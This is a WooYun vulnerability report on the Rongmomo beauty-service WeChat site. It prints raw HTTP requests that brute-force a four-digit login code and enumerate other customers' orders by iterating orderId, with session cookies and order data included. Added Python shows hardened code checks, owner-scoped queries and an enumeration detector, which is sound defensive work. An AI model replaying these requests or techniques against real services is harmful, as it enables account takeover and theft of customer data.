Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0157136

Title: Rongmomo (容么么) door-to-door beauty O2O unauthorized access / arbitrary user login (13888888888 as example) /

Affected vendor: 北京高比格科技有限公司

Author: milan

Submitted: 2015-12-01 20:59

Fix time: 2016-01-15 21:00

Public disclosure: 2016-01-15 21:00

Vulnerability type: Design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-01: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-01-15: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Arbitrary user login on a door-to-door beauty O2O service

Detailed description:

Logging in through the WeChat official account requires only a mobile number and a verification code, and the code is only four digits. A four-digit code can be brute-forced.

POST /site/login HTTP/1.1
Host: wechat.rongmomo.cc
Accept: application/json, text/javascript, */*; q=0.01
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://wechat.rongmomo.cc
Content-Length: 112
Connection: close
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CN
Referer: http://wechat.rongmomo.cc/site/login
Cookie: PHPSESSID=rp11cavm433sb45pis0ut7jpl4; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; checkoutOrder=%7B%22order_id%22%3A85732%2C%22number%22%3A%221573785732%22%2C%22paid_amount%22%3A228%2C%22created_at%22%3A%222015-11-30+18%3A05%22%2C%22service_time%22%3A%222015-11-30+22%3A00%22%2C%22service_hours%22%3A90%2C%22finish_time%22%3A%222015-11-30+23%3A30%22%2C%22payment%22%3A1%7D; current_city=%7B%22id%22%3A%222%22%2C%22name%22%3A%22%E4%B8%8A%E6%B5%B7%E5%B8%82%22%7D; locate=1
mobile=13888888888&captcha=9220&_csrf=QXFVZndmZHYJIBYURFUNOilFBAdEAxFPdTosKwVXVz03Njk%2FQRE1GQ%3D%3D&reference=0
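
The weakness in the login above is a short, guessable code with no limit on how many guesses a client may submit. The Python below is an added example written for this page, not code from the reporter or from the rongmomo.cc application: it issues a six-digit code from a cryptographically secure generator, stores only a hash, expires the code after five minutes, burns it after five wrong guesses and compares it in constant time. The `OtpVerifier` class, its constants and the column of numbers are assumptions for illustration; the mobile number 13888888888 is the example number from the report title.

```python
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass

CODE_DIGITS = 6          # 10^6 possibilities instead of the reported 10^4
CODE_TTL_SECONDS = 300   # a code is only valid for five minutes
MAX_ATTEMPTS = 5         # after this many wrong guesses the code is burned


@dataclass
class _PendingCode:
    code_hash: bytes
    expires_at: float
    attempts: int = 0


class OtpVerifier:
    """Issue and verify SMS login codes per mobile number (hypothetical class)."""

    def __init__(self, clock=time.time):
        self._clock = clock      # injectable so expiry can be tested
        self._pending = {}       # mobile -> _PendingCode

    @staticmethod
    def _digest(mobile, code):
        # Only a hash is stored, so a leaked store does not leak live codes.
        return hashlib.sha256(f"{mobile}:{code}".encode()).digest()

    def issue(self, mobile):
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[mobile] = _PendingCode(
            self._digest(mobile, code), self._clock() + CODE_TTL_SECONDS
        )
        return code  # handed to the SMS gateway in production, never to the HTTP client

    def verify(self, mobile, code):
        pending = self._pending.get(mobile)
        if pending is None:
            return False
        if self._clock() > pending.expires_at:
            del self._pending[mobile]
            return False
        pending.attempts += 1
        ok = hmac.compare_digest(pending.code_hash, self._digest(mobile, str(code)))
        if ok or pending.attempts >= MAX_ATTEMPTS:
            # one-time use on success; burned after too many wrong guesses
            del self._pending[mobile]
        return ok


def brute_force_success_probability(digits, attempts):
    """Chance that `attempts` blind guesses hit a `digits`-digit code."""
    return min(1.0, attempts / 10 ** digits)


if __name__ == "__main__":
    verifier = OtpVerifier()
    mobile = "13888888888"  # example number from the report title
    code = verifier.issue(mobile)
    print("correct code accepted:", verifier.verify(mobile, code))
    print("4 digits, unlimited guesses:", brute_force_success_probability(4, 10_000))
    print("6 digits, 5 guesses:", brute_force_success_probability(CODE_DIGITS, MAX_ATTEMPTS))
```

The attempt counter lives with the code rather than with the client, so rotating IP addresses or sessions does not reset it; a per-IP rate limit at the web tier is a complementary control, not a replacement for this one.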


[Screenshot: 1.jpg]


Proof of vulnerability:

Order-detail request from the WeChat official account; simply iterate over orderId.

GET /order/detail?orderId=85731 HTTP/1.1
Host: wechat.rongmomo.cc
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=c3v80m9m1n6csbjcl792l1duc0; _csrf=95f86ab8ba8a4a30b120d56e1a64caaa16981c700ba0d328e3827acdf94b4be7a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22HQCr33iLh4Qa3eu94KyMr13KvGlY6wQo%22%3B%7D; _identity=53eaab2f6b24892bb386e075219dd191974e98feeb5b731042a37313c27238ffa%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B27589%2C%222v3gFv_tlIWmhhywShV72Sa6gI534BdC%22%2C2592000%5D%22%3B%7D; current_city=%7B%22id%22%3A%221%22%2C%22name%22%3A%22%E5%8C%97%E4%BA%AC%E5%B8%82%22%7D; locate=1
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13B143 MicroMessenger/6.3.7 NetType/WIFI Language/zh_CN
Accept-Language: zh-cn
Referer: http://wechat.rongmomo.cc/pay/fail?id=85732&attach=1
Cache-Control: max-age=0
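
The request above resolves an order from `orderId` alone, so any logged-in session can read any order. The Python below is an added example, not the application's code; the table schema, column names and access-log format are assumptions for illustration. Order 85732 with number 1573785732, amount 228 and user id 27589 are values visible in the report's cookies; order 85731's owner and the session ids are constructed. It contrasts the id-only lookup with one scoped to the authenticated user, and adds a small detector that flags a session requesting many distinct order ids from constructed log lines.

```python
import re
import sqlite3
from collections import defaultdict


def build_db():
    """Constructed in-memory order table; the schema is an assumption."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE orders (id INTEGER PRIMARY KEY, user_id INTEGER NOT NULL, "
        "number TEXT NOT NULL, paid_amount INTEGER NOT NULL)"
    )
    db.executemany(
        "INSERT INTO orders VALUES (?, ?, ?, ?)",
        [(85731, 27588, "1573785731", 198),   # owner 27588 is constructed
         (85732, 27589, "1573785732", 228)],  # values from the report's cookies
    )
    return db


def order_detail_vulnerable(db, order_id):
    """Lookup by id only: any authenticated session can read any order."""
    return db.execute(
        "SELECT id, user_id, number, paid_amount FROM orders WHERE id = ?",
        (order_id,),
    ).fetchone()


def order_detail_fixed(db, current_user_id, order_id):
    """Lookup scoped to the user id taken from the server-side session, never
    from the request. A foreign order is indistinguishable from a missing one."""
    return db.execute(
        "SELECT id, user_id, number, paid_amount FROM orders "
        "WHERE id = ? AND user_id = ?",
        (order_id, current_user_id),
    ).fetchone()


# Constructed access-log format: <client ip> <session id> "<request line>" <status>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<sess>\S+) '
    r'"GET /order/detail\?orderId=(?P<oid>\d+) HTTP/1\.1" (?P<status>\d{3})$'
)

SAMPLE_LOG = [
    # a normal user reloading the one order they just paid for
    '203.0.113.7 sess_normal "GET /order/detail?orderId=85732 HTTP/1.1" 200',
    '203.0.113.7 sess_normal "GET /order/detail?orderId=85732 HTTP/1.1" 200',
] + [
    # one session walking sequential order ids
    f'198.51.100.9 sess_walker "GET /order/detail?orderId={oid} HTTP/1.1" 200'
    for oid in range(85725, 85735)
]


def detect_enumeration(log_lines, threshold=5):
    """Return {session: sorted distinct orderIds} for sessions that requested
    more than `threshold` distinct ids; unrelated lines are ignored."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m["sess"]].add(int(m["oid"]))
    return {s: sorted(ids) for s, ids in seen.items() if len(ids) > threshold}


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", order_detail_vulnerable(db, 85731))   # another user's order
    print("fixed:", order_detail_fixed(db, 27589, 85731))      # None
    print("flagged:", detect_enumeration(SAMPLE_LOG))
```

Returning the same "not found" result for a foreign order and a missing one keeps the endpoint from confirming which ids exist; the log check catches the pattern at the edge even before the query is fixed.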


[Screenshot: 1.jpg]

Fix suggestion:

You're the experts.

Copyright notice: please credit the source when reposting: milan@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused